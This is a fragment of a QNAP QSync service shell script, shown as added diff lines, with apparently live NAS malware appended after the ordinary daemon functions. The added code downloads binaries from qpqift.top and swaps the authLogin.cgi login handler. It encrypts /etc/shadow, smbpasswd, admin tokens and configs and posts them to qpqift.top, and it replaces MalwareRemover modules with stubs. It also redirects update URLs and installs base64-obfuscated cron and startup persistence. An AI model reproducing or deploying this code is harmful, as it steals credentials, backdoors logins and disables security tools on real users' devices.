+		[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
+		[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
+		/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
+		echo "OK"
+	fi
+}
+
+stop()
+{
+	echo "Shutting down QSync monitor: OK"
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        kill $pidnum 2>/dev/null
+        i=0
+        while [ ${i} -lt 5 ]
+        do
+                pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+                if [ -z "$pidnum" ]; then
+                        break
+                fi
+                sleep 1
+                i=`/usr/bin/expr ${i} + 1`
+        done
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        [ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
+	/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
+	/usr/bin/killall -q qsyncman
+}
+
+start_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x1 ] || return -1
+	_qsyncd_run_pid=`/bin/pidof qsyncd`
+	[ -z $_qsyncd_run_pid ] || return -114
+	_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
+	_with_syslog=$1
+	if [ "x$_recycle_en" = xTRUE  ]; then
+		if [ "x$_with_syslog" = x1  ]; then
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	else
+		if [ "x$_with_syslog" = x1  ]; then
+			/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	fi
+	_iret=$?
+	if [ "x$_iret" = x0 ]; then
+		i=0
+		while [ ${i} -lt 10000 ]
+		do
+			echo "${i} millisecond..."
+			_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+			_qsyncd_run_pid=`/bin/pidof qsyncd`
+			if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
+				break
+			fi
+			usleep 50000
+			i=`/usr/bin/expr ${i} + 50`
+		done
+	fi
+	return -$_iret
+}
+
+stop_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x0 ] || return -1
+	_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
+	[ $_qsyncd_pid -lt 0 ] && return -3
+	# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
+	/bin/kill -SIGUSR1 $_qsyncd_pid
+	usleep 200000
+	# Send SIGINT to stop the QSyncd process
+	/bin/kill -SIGINT $_qsyncd_pid
+	_kill_ret=$?
+	if [ "x$_kill_ret" != x0 ]; then
+		return -3
+	fi
+	echo "need wait $1 millisecond"
+	i=0
+	while true
+	do
+		echo "${i} millisecond..."
+		_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+		_qsyncd_run_pid=`/bin/pidof qsyncd`
+		if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
+			break
+		fi
+		if [ ${i} -ge $1 ]; then
+			# if time-out, we send two additional SIGINT to force the daemon to stop.
+			if [ $_qsyncd_pid -ge 0 ]; then
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+				usleep 200000
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+			fi
+			j=0
+			while [ ${j} -lt 500 ]
+			do
+				_qsyncd_run_pid=`/bin/pidof qsyncd`
+				if [ -z $_qsyncd_run_pid ]; then
+					return 0
+				fi
+				usleep 20000
+				j=`/usr/bin/expr ${j} + 20`
+			done
+			return -62
+		fi
+		usleep 50000
+		i=`/usr/bin/expr ${i} + 50`
+	done
+	return 0
+}
+
+
+install()
+{
+	lock_file="/var/lock/qbox_install_bin.lck"
+
+	if [ ! -f "${INSTALL_BUILD_IN}" ]; then
+		dbg "build-in ${QSYNC_NAME} is installed"
+		return 1
+	fi
+
+	if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
+		dbg "${QSYNC_NAME}.bin} not found"
+		return 1
+	fi
+
+	if [ ! -x "${QPKG_CLI}" ]; then
+		dbg "${QPKG_CLI} not found"
+		return 1
+	fi
+
+	## make sure volume is exist
+	if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
+		dbg "/share/Public not found"
+		return 1
+	fi
+
+	## is removed 
+	if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
+		/bin/rm -f ${INSTALL_BUILD_IN}
+		dbg "${QSYNC_NAME} is removed"
+		return 1
+	fi
+
+	if [ -f "$lock_file" ]; then 
+		if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
+			echo "${QSYNC_NAME} is installing"
+			dbg "${QSYNC_NAME} is installing"
+			return 1
+		fi
+	fi
+
+	/bin/touch "$lock_file"	
+	/bin/rm -f ${INSTALL_BUILD_IN}
+	dbg "install build-in ${QSYNC_NAME} start"
+
+	set_default_disable_status
+
+	## install build in Qsync
+	${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
+	sleep 20
+
+	wait_install=60
+	## avoid initial take long time or fail
+        while [ "$wait_install" -gt 0 ]; do
+		stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
+                if [ "$stcode" = "0" ]; then
+                        break
+                fi
+                sleep 1
+                let "wait_install--"
+        done
+
+	${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
+	/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
+	/bin/rm -f "$lock_file"	
+	dbg "install build-in ${QSYNC_NAME} success"
+}
+
+if [ "$1" == "stop" ]; then
+	exit 0
+fi
+fi
+XEOF
+chmod 755 ".backup_${file}"
+if grep "\.backup_${file}" "$file"; then
+:
+else
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
+echo ". ./.backup_${file}" >> "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+fi
+
+fi
+
+if [ ! -f ".qdisk_cmd" ]; then
+	case "$(uname -m)" in 
+	*x86_64*)
+			arch=x86_64
+			binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
+			;;
+	*arm*|*aarch*)
+			arch=arm
+			binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
+			;;
+	*i*86*)
+			arch=i486
+			binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
+			;;
+	esac
+	
+	if [ "x${binhash}" != 'x' ]; then
+		curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
+		test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
+		if [ "x${rsynchash}" = "x${binhash}" ]; then
+			mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
+		else
+			rm -f '.qdisk_cmd.tmp'
+		fi
+	fi
+fi
+binhash=''; rsynchash=''
+
+for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
+if [ -f "${path#*/}" ]; then 
+test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "${path#*/}"
+elif [ -f "${bdir}/.qpkg/${path}" ]; then
+test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "${bdir}/.qpkg/${path}"
+fi
+done
+
+version=$(getcfg System Version)
+test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
+test "${version##*.}" -lt 3 || test "${version%%.*}" -lt 4 || test "$(version=${version#*.}; echo "${version%.*}")" -lt 3 && version=4.3.3 || { test "${version##*.}" -gt 5 && version=4.3.5; }
+
+if [ ! -d rssdoc ]; then 
+command -v bunzip2 && compext=bz2 || compext=gz
+curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" && test -f "rssdoc.tar.${compext}" && rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)" && { test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA="; } && { test "$compext" = bz2 && tarflag=j || tarflag=z; } && tar -x${tarflag}f "rssdoc.tar.${compext}" || rm -f rssdoc.tar
+rm -f "rssdoc.tar.${compext}"
+fi
+
+rm -f /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
+ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
+
+if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
+internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
+localupdateurl="http://127.0.0.1:${internalwebport}"
+sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
+fi
+
+test -f '/etc/config/rssdoc/qpkgcenter_*.xml' || test -h '/etc/config/rssdoc/qpkgcenter_*.xml' && { test -f '.qdisk_cmd' && ./.qdisk_cmd -i '/etc/config/rssdoc/qpkgcenter_*.xml'; rm -f '/etc/config/rssdoc/qpkgcenter_*.xml'; }
+
+if find /etc/config/rssdoc | grep 'qpkgcenter_.*\.xml'; then
+:
+else
+cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
+fi
+
+for file in /etc/config/rssdoc/qpkgcenter_*.xml
+do
+if [ -f "$file" ] && { rm -f "$file" || [ ! -s "$file" ]; }; then
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
+touch "$file"
+cp -f "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+fi
+done
+file=''
+
+for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
+test -d "$qpkgdir" && break
+done
+test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
+test -d "${qpkgdir}/MalwareRemover/modules" || mkdir "${qpkgdir}/MalwareRemover/modules"
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover"
+
+if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
+for file in 10_derek_3.pyc 12_derek_3.pyc; do
+if [ ! -f "${qpkgdir}/MalwareRemover/modules/${file}" ] || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" || test -x "${qpkgdir}/MalwareRemover/modules/${file}" || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -gt 150 ] || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -lt 120 ]; then
+test -f '.qdisk_cmd' && test -f "${qpkgdir}/MalwareRemover/modules/${file}" && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover/modules/${file}" && rm -f "${qpkgdir}/MalwareRemover/modules/${file}"
+openssl base64 -d <<"EOF" >"${qpkgdir}/MalwareRemover/modules/${file}"
+A/MNCuVwTVxjAAAAAAAAAAABAAAAQAAAAHMLAAAAZQAAgwAAAWQAAFMoAQAAAE4o
+AQAAAHQEAAAAZXhpdCgAAAAAKAAAAAAoAAAAAHMVAAAAbW9kdWxlcy8xMF9kZXJl
+a18zLnB5dAgAAAA8bW9kdWxlPgEAAABzAAAAAA==
+EOF
+chmod -x "${qpkgdir}/MalwareRemover/modules/${file}"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
+fi
+done
+fi
+file=''; qpkgdir=''
+
+if [ ! -f .rsakey ]; then
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+fi
+
+cgibindir='/home/httpd/cgi-bin'
+if [ ! -f "1551848401_c" ] && [ -f "${cgibindir}/authLogin.cgi" ] && [ ! -f "${cgibindir}/sysauthLogin.cgi" ]; then
+	test -f "1551848401_c" || touch "1551848401_c"
+	case "$(uname -m)" in 
+	*x86_64*)
+			arch=x86_64
+			binhash='rrYwg0D4+4DxcDxYQsNTB4JUGlQ='
+			;;
+	*arm*|*aarch*)
+			arch=arm
+			binhash='Z4n2BZdhwjYf0wjM7GCW61WM9eU='
+			;;
+	*i*86*)
+			arch=i486
+			binhash='U3eHe6syQraRBGgsvkFZH3wibDw='
+			;;
+	esac
+	
+	if [ "x${binhash}" != 'x' ]; then
+		curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal2_${arch}" || rm -f ".qal"
+		test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
+		if [ "x${rsynchash}" = "x${binhash}" ]; then
+			test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
+			mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod 755 "${cgibindir}"/authLogin.cgi
+		fi
+		test -f '.qal' && rm -f '.qal'
+	fi
+fi
+
+if  [ -f "${cgibindir}"/authLogin.cgi ] && "${cgibindir}"/authLogin.cgi | grep '<QDocRoot'; then
+:
+else
+test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
+fi
+
+test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
+if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
+sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
+lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
+sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
+kill -2 "$sshpid"
+fi
+
+if [ ! -f '1548997200_c' ]; then
+touch '1548997200_c'
+mdir=`mktemp -d /tmp/.mount.XXXXXX` || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; } || mdir=`mktemp -d "${bdir}/.mount.XXXXXX"` || { mdir="${bdir}/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/mnt/HDA_ROOT/.mount.XXXXXX"` || { mdir="/mnt/HDA_ROOT/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/.mount.XXXXXX"` || { mdir="/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "./.mount.XXXXXX"` || { mdir="./.mount.jbbxQob"; mkdir ${mdir}; }
+__BOOT_DEV=
+__model=`getcfg System "Internal Model"`
+CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
+CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
+CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
+__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; } 
+command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
+test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
+test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }
+
+if [ $? -eq 0 ] || mount | grep "$mdir" >/dev/null; then
+for file in "${mdir}"/K01* "${mdir}/autorun.sh" '/tmp/config/autorun.sh'; do
+if [ -f "$file" ]; then
+sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
+verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
+grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
+sedreplace "$grepstring" "$sedcmd" "$file"
+sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
+grepstring='g4rwwSz1Bp1i1'"'"
+sedreplace "$grepstring" "$sedcmd" "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "$file"
+fi
+done
+fi
+umount "$mdir"
+rmdir "$mdir"
+fi
+
+if [ ! -f '1553058001_c' ]; then
+touch '1553058001_c'
+key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
+test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
+{ echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
+{ echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/smbpasswd /etc/shadow /etc/config/*.conf /etc/default_config/*.conf /etc/*.conf /etc/config/.*.conf /etc/default_config/.*.conf /etc/.*.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; printf '%s:' "display_name"; /sbin/get_display_name; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
+fi
+
+if [ ! -f 1551848403_c ]; then
+touch 1551848403_c
+test -f liveupdate.sh && cronscriptpath=.liveupdate/liveupdate.sh || { test -f backup_conf.sh && cronscriptpath=.config/backup_conf.sh; }
+
+if [ ! -z $cronscriptpath ]; then
+test -d "${bdir}/.system" || mkdir -p "${bdir}/.system"
+echo '(exec>/dev/null>&1 2>&1;(PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin";openssl base64 -d -A <<"EOF"|sh&' > "${bdir}/.system/.qinstaller.sh"
+chmod 755 "${bdir}/.system/.qinstaller.sh"
+{
+cat <<"XXEOF"
+( exec >/dev/null 2>&1; (
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+test -d "$confdir" || confdir=/etc/config
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
+\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
+//I;s/\(^\|\
+\)\[[^\
+]\+\]\
+.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+test "$fgrep" || fgrep=grep
+sleep 5
+XXEOF
+cat <<XXEOF
+if [ ! -f "\${bdir}/.qpkg/${cronscriptpath}" ]; then
+set_mutable() {
+    if [ ! -e "\$1" ]; then
+        return 0
+    fi
+    if [ -e /etc/IS_64BITS ]; then
+        # 64bit set mutable
+        SET_M_64="\$1"
+        python -c "import os,fcntl,sys,struct;fd = os.open('\${SET_M_64}', os.O_RDONLY); rec = struct.pack('L', 0); x = fcntl.ioctl(fd, 0x80086601, rec); flags = struct.unpack('L',x)[0]; was_immutable = flags & 0x00000010; flags = flags & ~0x00000010; f = struct.pack('i', flags); fcntl.ioctl(fd, 0x40086602, f); os.close(fd)"
+    else
+        # 32bit set mutable
+        SET_M_32="\$1"
+        python -c "import os,fcntl,sys,struct;fd = os.open('\${SET_M_32}', os.O_RDONLY); rec = struct.pack('L', 0); x = fcntl.ioctl(fd, 0x80046601, rec); flags = struct.unpack('L',x)[0]; was_immutable = flags & 0x00000010; flags = flags & ~0x00000010; f = struct.pack('i', flags); fcntl.ioctl(fd, 0x40046602, f); os.close(fd)"
+    fi
+}
+test -f "\${bdir}/.qpkg/${cronscriptpath%/*}" || test -h "\${bdir}/.qpkg/${cronscriptpath%/*}" && { set_mutable "\${bdir}/.qpkg/${cronscriptpath%/*}"; rm -f "\${bdir}/.qpkg/${cronscriptpath%/*}"; }
+test -d "\${bdir}/.qpkg" || mkdir -p "\${bdir}/.qpkg" || mkdir "\${bdir}/.qpkg"
+test -d "\${bdir}/.qpkg/${cronscriptpath%/*}" || mkdir "\${bdir}/.qpkg/${cronscriptpath%/*}"
+cat > "\${bdir}/.qpkg/${cronscriptpath}" <<"XEOF"
+XXEOF
+cat "${cronscriptpath#*/}"
+cat <<XXEOF
+XEOF
+chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
+touch -cr /bin/busybox "\${bdir}/.qpkg/${cronscriptpath}"
+( ( exec >/dev/null 2>&1 </dev/null; "\${bdir}/.qpkg/${cronscriptpath}" </dev/null >/dev/null 2>/dev/null & ) & )
+fi
+
+test -x "\${bdir}/.qpkg/${cronscriptpath}" || chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
+
+crontabargs=\$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\\(.\\+\\)/\\1/p')
+trycount=10; trycount=\$(( \$trycount - 10 ))
+set x \$crontabargs; shift
+while [ \$# -gt 0 ] && [ \$trycount -lt 10 ]; do
+trycount=\$(( \$trycount + 1 ))
+getopts ':c:' OPT 2>/dev/null
+test "\$OPT" = 'c' && crontabfile="\${OPTARG}/admin" && break
+test "\$OPTIND" -gt 0 && shift "\$OPTIND" && OPTIND=1 || break
+done
+test "\$crontabfile" && test -f "\${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
+
+for crontab in "\$crontabfile" "\${confdir}/crontab"; do
+if \$fgrep "\${bdir}/.qpkg/${cronscriptpath}" "\$crontab"; then
+:
+else
+cronmins=\$(printf '%i' "\$(( \$RANDOM % 60 ))")
+cronhour=\$(printf '%i' "\$(( \$RANDOM % 24 ))")
+cronhour=\$(printf '%i,' "\$(( ( \$cronhour + 8 ) % 24 ))" "\$(( ( \$cronhour + 16 ) % 24 ))")"\$cronhour"
+echo "\$cronmins \$cronhour"' * * * '"\${bdir}/.qpkg/${cronscriptpath} >/dev/null 2>/dev/null" >> "\$crontab"
+crontab "\$crontab"
+sleep 2
+fi
+done
+) & ) &
+XXEOF
+} | { openssl base64 -A; echo; echo 'EOF'; echo ')&)'; } >> "${bdir}/.system/.qinstaller.sh"
+{ { crontab -l || cat /etc/config/crontab; } | grep -v '^ *#' | awk '{ print $6 }'; sed -n 's/^ \?[Ss]hell \?= \?//p' /etc/config/qpkg.conf; } | grep '/' | sort | uniq | while IFS= read -r line; do
+test ! -z "$line" || continue
+test -f "$line" || continue
+test "$line" = $(pwd)/liveupdate.sh || test "$line" = $(pwd)/backup_conf.sh && continue
+grep '/\.system/\.qinstaller\.sh"; exit' "$line" && continue
+head -n 1 "$line" | grep '^#! \?/bin/b\?a\?sh' || continue;
+tab='	'
+test "${#tab}" -eq 1 || tab=$(printf '\011') || tab=$(echo -e '\011')
+sed -i 's!^\([ '"$tab"']\{1,\}\)exit\([ '"$tab"']\{1,\}[0-9]\{1,\}\)\{0,1\}\(\;\{0,1\}[ '"$tab"']*\)$!\1{ '"${bdir}/.system/.qinstaller.sh"'; exit\2; }\3!;s!^exit\([ '"$tab"']\{1,\}[0-9]\{1,\}\)\{0,1\}\(\;\{0,1\}[ '"$tab"']*\)$!{ '"${bdir}/.system/.qinstaller.sh"'; exit\1; }!;s!/.qpkg/.q\{0,1\}installer.sh; exit!/.system/.qinstaller.sh; exit!' "$line"
+hash=''
+hash=$(sed -n '2,5p' "$line" | md5sum)
+hash=${hash%${hash##*[0-9a-f]}}; hash=${hash#${hash%%[0-9a-f]*}}
+trycnt=20
+while [ "x$hash" = 'x18ec5ab42dc1231da518951e4479c27b' ] && [ "$trycnt" -gt 0 ]; do
+trycnt=$(( $trycnt - 1))
+sed -i '2,5d' "$line"
+hash=''
